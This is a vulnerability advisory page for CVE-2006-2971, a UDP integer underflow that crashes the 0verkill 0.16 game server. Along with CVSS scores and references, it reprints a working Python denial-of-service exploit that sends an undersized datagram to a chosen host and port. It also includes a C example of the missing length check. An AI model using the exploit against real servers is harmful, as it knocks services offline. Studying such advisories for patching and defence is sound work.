CVE-2006-2971
CVSS 5.0
Published: 2006-06-12 16:06:00
Last revised: 2011-03-07 21:37:24

[Original] Integer overflow in the recv_packet function in 0verkill 0.16 allows remote attackers to cause a denial of service (daemon crash) via a UDP packet with fewer than 12 bytes, which results in a long length value to the crc32 function.


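[CNNVD] 0verkill recv_packet function integer overflow vulnerability (CNNVD-200606-229)

        An integer overflow exists in the recv_packet function in 0verkill 0.16. A remote attacker can send a UDP packet of fewer than 12 bytes, which causes a long length value to be passed to the crc32 function and results in a denial of service (daemon crash).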

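- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found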

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2971
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2971
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-229
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/2245
(UNKNOWN)  VUPEN  ADV-2006-2245
http://www.securityfocus.com/bid/18353
(UNKNOWN)  BID  18353
http://www.securityfocus.com/archive/1/archive/1/436659/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060609 0verkill 0.6, Remote integer overflow
http://secunia.com/advisories/20551
(VENDOR_ADVISORY)  SECUNIA  20551
http://xforce.iss.net/xforce/xfdb/27028
(UNKNOWN)  XF  overkill-recvpacket-integer-underflow(27028)
http://www.osvdb.org/26029
(UNKNOWN)  OSVDB  26029
http://securityreason.com/securityalert/1090
(UNKNOWN)  SREASON  1090

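- Vulnerability information

0verkill recv_packet function integer overflow vulnerability
Medium risk  Buffer overflow
2006-06-12 00:00:00 2006-06-13 00:00:00
Remote
        An integer overflow exists in the recv_packet function in 0verkill 0.16. A remote attacker can send a UDP packet of fewer than 12 bytes, which causes a long length value to be passed to the crc32 function and results in a denial of service (daemon crash).

- Advisories and patches

        No data available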

- Vulnerability information (1894)

0verkill 0.16 (ASCII-ART Game) Remote Integer Overflow Crash Exploit (EDBID:1894)
linux dos
2006-06-09 Verified
0 Federico Fazzi
N/A
#!/usr/bin/env python
#
# -----------------------------------------------------
# Exploit id: FSE:016
#
# Author:     Federico Fazzi
# Contact:    federico@autistici.org
# Date:	    09/06/2006, 13:58
# Sinthesis:  0verkill 0.16, Remote integer overflow
# Product:    http://artax.karlin.mff.cuni.cz/~brain/0verkill/
# -----------------------------------------------------
#
# Start with:
# python f_0k-0.1.py <remote_addr> <remote_port>
#

# Proof of concept:
# (gdb) run
# Starting program: /home/federico/0verkill-0.16/server
# 9. 6.2006 14:18:07  Running 0verkill server version 0.16
# 9. 6.2006 14:18:07  Initialization.
# 9. 6.2006 14:18:07  Loading sprites.
# 9. 6.2006 14:18:07  Loading level "level1"....
# 9. 6.2006 14:18:07  Loading level graphics.
# 9. 6.2006 14:18:08  Loading level map.
# 9. 6.2006 14:18:08  Loading level objects.
# 9. 6.2006 14:18:08  Initializing socket.
# 9. 6.2006 14:18:08  Installing signal handlers.
# 9. 6.2006 14:18:08  Game started.
# 9. 6.2006 14:18:08  Sleep
# 9. 6.2006 14:18:10  Wakeup
#
# (run python f_0k-0.6.py)
#
# Program received signal SIGSEGV, Segmentation fault.
# crc32 (buf=0x837a000 <Address 0x837a000 out of bounds>, len=4294967288) at crc32.c:82
# warning: Source file is more recent than executable.
# 82            DO8(buf);
#
# #0  0x0805b54a in recv_packet (packet=0x805fd20 "",
# max_len=256, addr=0xf18df475, addr_len=0xf18df475, sender_server=0, recipient=0,
# sender=0xbfcf6d54) at net.c:94
# 94              if (crc!=crc32(packet,retval-12))return -1;
#
# The minimum receive size is 12 bytes; if you send fewer than that,
# the game crashes.

import os, sys
from socket import *

usage = "run: python %s [remote_addr] [remote_port] " % os.path.basename(sys.argv[0])

if len(sys.argv) < 3: 
	print usage 
	sys.exit()

host = sys.argv[1]
port = int(sys.argv[2])

sock = socket(AF_INET, SOCK_DGRAM)
sock.connect((host, port))

print "connecting.. ",
if sock > 0:
    print "done!"
else:
    print "wrong!"

print "crashing the server.. ",
if sock.sendto('0x00' , (host, port)):
    print "done!"
else:
    print "wrong!"

print "wait five seconds, if no data found press CTRL+C"
try:
	reply = sock.recvfrom(512)
	print reply
except:
	print "no data receive!"
	sys.exit()

# milw0rm.com [2006-06-09]
		

- Vulnerability information

26029
0verkill recv_packet() Function UDP Handling Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability description

0verkill contains a flaw that may allow a remote denial of service. The issue is triggered when an integer underflow occurs in the recv_packet() function, which handles received UDP packets, and results in loss of availability for the 0verkill daemon. An attacker can send a UDP packet smaller than 12 bytes to cause the underflow and crash the daemon process, causing a denial of service.
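
The arithmetic behind the crash and the length check that prevents it, as an added example (not code from 0verkill or from the advisory). The function names and the header layout are assumptions; only the 12-byte subtraction and the `len=4294967288` value come from the gdb trace above.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define HEADER_LEN 12  /* the 12 bytes subtracted in recv_packet, per the trace */

/* Length that the unchecked expression `retval-12` becomes once it is
 * converted to a 32-bit unsigned crc32() length parameter. */
uint32_t unchecked_crc_len(int retval)
{
    return (uint32_t)(retval - HEADER_LEN);
}

/* Plain bitwise CRC-32 (IEEE polynomial), included only to stay self-contained. */
uint32_t crc32_simple(const unsigned char *buf, size_t len)
{
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        crc ^= buf[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* Hardened check: reject short or failed reads BEFORE any subtraction.
 * Assumed layout (not from the page): bytes 0..3 hold the payload CRC
 * in host byte order, bytes 4..11 are other header fields.
 * Returns the payload length, or -1 if the datagram must be dropped. */
long validate_datagram(const unsigned char *pkt, long retval, size_t max_len)
{
    uint32_t stored;

    if (retval < HEADER_LEN || (size_t)retval > max_len)
        return -1;                 /* too short, recv error, or oversized */
    memcpy(&stored, pkt, sizeof stored);
    if (stored != crc32_simple(pkt + HEADER_LEN, (size_t)retval - HEADER_LEN))
        return -1;                 /* checksum mismatch */
    return retval - HEADER_LEN;
}
```

A 4-byte datagram gives `unchecked_crc_len(4) == 4294967288`, the same length seen in the crash; `validate_datagram` drops that datagram before any checksum is computed.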

- Timeline

2006-06-09 Unknown
2006-06-09 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue.

- Related references

- Vulnerability author
